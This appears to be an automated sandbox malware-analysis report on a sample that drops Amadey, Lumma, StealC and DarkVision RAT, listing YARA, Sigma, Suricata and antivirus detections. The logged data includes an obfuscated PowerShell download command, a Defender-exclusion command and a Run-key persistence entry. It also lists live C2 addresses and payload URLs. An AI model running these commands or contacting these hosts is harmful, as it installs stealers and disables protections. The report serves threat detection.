49.2.explorer.exe.2750000.0.unpack	OlympicDestroyer_1	OlympicDestroyer Payload	kevoreilly	0xd5ee8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6148:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd63a8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6618:$string1: SELECT origin_url, username_value, password_value FROM logins 0xd6fb8:$string1: SELECT origin_url, username_value, password_value FROM logins 0xe85a8:$string2: API call with %s database connection pointer 0xe9c60:$string3: os_win.c:%d: (%lu) %s(%s) - %s
2.2.skotes.exe.950000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.2.skotes.exe.950000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.fe0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.950000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 2188, ProcessName: powershell.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c92938c010.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8132, ProcessName: powershell.exe

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 2188, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 2188, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe, ParentProcessId: 1608, ParentProcessName: 2bd330404c.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7660, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7804, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c92938c010.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\explorer.exe, SourceProcessId: 2832, StartAddress: AA0000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 6044

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'", ProcessId: 2188, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8044, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8132, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3744, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\cmd.exe, ProcessId: 8044, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:06:59.511251+0100	2028371	3	Unknown Traffic	192.168.2.4	49931	154.216.20.243	443	TCP
2024-12-09T08:08:21.402599+0100	2028371	3	Unknown Traffic	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:23.678351+0100	2028371	3	Unknown Traffic	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:26.669537+0100	2028371	3	Unknown Traffic	192.168.2.4	49814	104.21.16.9	443	TCP
2024-12-09T08:08:29.350443+0100	2028371	3	Unknown Traffic	192.168.2.4	49820	104.21.16.9	443	TCP
2024-12-09T08:08:31.898086+0100	2028371	3	Unknown Traffic	192.168.2.4	49828	104.21.16.9	443	TCP
2024-12-09T08:08:34.631758+0100	2028371	3	Unknown Traffic	192.168.2.4	49840	104.21.16.9	443	TCP
2024-12-09T08:08:36.634989+0100	2028371	3	Unknown Traffic	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:37.321256+0100	2028371	3	Unknown Traffic	192.168.2.4	49847	104.21.16.9	443	TCP
2024-12-09T08:08:39.419684+0100	2028371	3	Unknown Traffic	192.168.2.4	49855	104.21.16.9	443	TCP
2024-12-09T08:08:48.307412+0100	2028371	3	Unknown Traffic	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:08:52.618249+0100	2028371	3	Unknown Traffic	192.168.2.4	49878	154.216.20.243	443	TCP
2024-12-09T08:08:55.178124+0100	2028371	3	Unknown Traffic	192.168.2.4	49879	154.216.20.243	443	TCP
2024-12-09T08:09:01.806109+0100	2028371	3	Unknown Traffic	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:02.596451+0100	2028371	3	Unknown Traffic	192.168.2.4	49924	154.216.20.243	443	TCP
2024-12-09T08:09:03.840908+0100	2028371	3	Unknown Traffic	192.168.2.4	49940	104.21.16.9	443	TCP

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:55.858928+0100	2022482	1	A Network Trojan was detected	192.168.2.4	49879	154.216.20.243	443	TCP

ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:56.147922+0100	2021954	1	A Network Trojan was detected	154.216.20.243	443	192.168.2.4	49879	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:22.413934+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:25.083887+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:38.123996+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:49.169752+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:09:02.525845+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49933	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:22.413934+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:38.123996+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:09:02.525845+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49933	104.21.16.9	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:25.083887+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49806	104.21.16.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:21.402599+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49799	104.21.16.9	443	TCP
2024-12-09T08:08:23.678351+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49806	104.21.16.9	443	TCP
2024-12-09T08:08:26.669537+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49814	104.21.16.9	443	TCP
2024-12-09T08:08:29.350443+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49820	104.21.16.9	443	TCP
2024-12-09T08:08:31.898086+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49828	104.21.16.9	443	TCP
2024-12-09T08:08:34.631758+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49840	104.21.16.9	443	TCP
2024-12-09T08:08:36.634989+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49845	104.21.16.9	443	TCP
2024-12-09T08:08:37.321256+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49847	104.21.16.9	443	TCP
2024-12-09T08:08:39.419684+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49855	104.21.16.9	443	TCP
2024-12-09T08:08:48.307412+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49875	104.21.16.9	443	TCP
2024-12-09T08:09:01.806109+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49933	104.21.16.9	443	TCP
2024-12-09T08:09:03.840908+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.4	49940	104.21.16.9	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:50.670222+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49886	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:14.178202+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49777	185.215.113.43	80	TCP
2024-12-09T08:08:22.514877+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49801	185.215.113.43	80	TCP
2024-12-09T08:08:30.761167+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49826	185.215.113.43	80	TCP
2024-12-09T08:08:37.844797+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49848	185.215.113.43	80	TCP
2024-12-09T08:08:52.208539+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49889	185.215.113.43	80	TCP

ET MALWARE Win32/DarkVision RAT CnC Checkin M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:50.129735+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49888	185.157.162.216	5200	TCP
2024-12-09T08:08:55.501821+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49917	185.157.162.216	5200	TCP
2024-12-09T08:08:58.178195+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49925	185.157.162.216	5200	TCP
2024-12-09T08:09:00.852607+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49934	185.157.162.216	5200	TCP
2024-12-09T08:09:03.533211+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49941	185.157.162.216	5200	TCP
2024-12-09T08:09:06.218667+0100	2045618	1	A Network Trojan was detected	192.168.2.4	49952	185.157.162.216	5200	TCP

ET MALWARE Win32/DarkVision RAT CnC Checkin M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:53.818125+0100	2045619	1	A Network Trojan was detected	192.168.2.4	49888	185.157.162.216	5200	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:19.863999+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.4	55732	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:33.120297+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49827	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:32.806167+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49827	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:33.445553+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49827	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:35.191730+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49827	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:33.574627+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49827	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:30.364906+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49820	104.21.16.9	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:32.360094+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49827	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:05.464141+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49754	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:12.837064+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49764	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:09.913160+0100	2803305	3	Unknown Traffic	192.168.2.4	49766	31.41.244.11	80	TCP
2024-12-09T08:08:15.691581+0100	2803305	3	Unknown Traffic	192.168.2.4	49783	185.215.113.16	80	TCP
2024-12-09T08:08:23.977285+0100	2803305	3	Unknown Traffic	192.168.2.4	49807	185.215.113.16	80	TCP
2024-12-09T08:08:32.221808+0100	2803305	3	Unknown Traffic	192.168.2.4	49829	185.215.113.16	80	TCP
2024-12-09T08:08:39.309393+0100	2803305	3	Unknown Traffic	192.168.2.4	49854	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:08:35.903722+0100	2803304	3	Unknown Traffic	192.168.2.4	49827	185.215.113.206	80	TCP
2024-12-09T08:08:54.967477+0100	2803304	3	Unknown Traffic	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:08:56.995197+0100	2803304	3	Unknown Traffic	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:08:59.288984+0100	2803304	3	Unknown Traffic	192.168.2.4	49880	185.215.113.206	80	TCP
2024-12-09T08:09:01.123177+0100	2803304	3	Unknown Traffic	192.168.2.4	49880	185.215.113.206	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/rowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/hpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllb_	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exez$	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/F8l	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllL	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeu	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllDataUser	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllvbnData	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/-	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/apiZwQdx	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dlldll	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 44.2.explorer.exe.ab0000.0.unpack	Malware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
Source: c92938c010.exe.7588.19.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["impend-differ.biz", "covery-mover.biz", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "print-vexer.biz", "atten-supporse.biz", "formy-spill.biz", "dwell-exclaim.biz"], "Build id": "C7CP--C"}
Source: 2bd330404c.exe.1608.17.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Multi AV Scanner detection for domain / URL

Source: woo097878781.win	Virustotal: Detection: 11%	Perma Link
Source: http://185.215.113.206/68b591d6548ec281/rowser	Virustotal: Detection: 17%	Perma Link
Source: http://woo097878781.win	Virustotal: Detection: 11%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 47%
